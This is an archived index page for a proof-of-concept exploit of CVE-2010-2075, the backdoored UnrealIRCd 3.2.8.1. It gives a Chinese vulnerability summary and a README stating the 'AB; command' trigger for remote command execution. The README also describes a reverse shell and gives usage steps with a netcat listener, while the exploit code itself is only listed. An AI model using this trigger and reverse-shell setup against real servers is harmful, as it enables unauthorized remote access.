CVE-2010-2075 PoC — UnrealIRCd 后门未授权访问漏洞

Source

https://github.com/MFernstrom/OffensivePascal-CVE-2010-2075

Associated Vulnerability

Title:UnrealIRCd 后门未授权访问漏洞 (CVE-2010-2075)
Description:2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd，在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的修改(特洛伊木马)，远程攻击者可执行任意命令。

Description

FreePascal implementation of the UnrealIRCD CVE-2010-2075

Readme

# CVE-2010-2075
FreePascal implementation of CVE-2010-2075

## Vulnerability
### UnrealIRCd 3.2.8.1
RCE by sending "`AB; command`" to any listening service. Any command you send is executed by the same user as UnrealIRCD runs as.

This implementation launches a reverse shell to your listener.

#### Step 1
Start a listener, ex. `netcat -lvp 4444`

#### Step 2
Execute exploit `./exploit <target ip> <target port> <host ip> <host port>` where host ip and port is where your listener is running

## Requirements
Synapse. If you don't have it, install through the OPM

File Snapshot


 [4.0K]  /data/pocs/949436c6843934d09423c54fef334bf239e27d2c
├── [1.7K]  exploit.lpi
├── [1.1K]  exploit.lpr
├── [ 11K]  LICENSE
└── [ 566]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!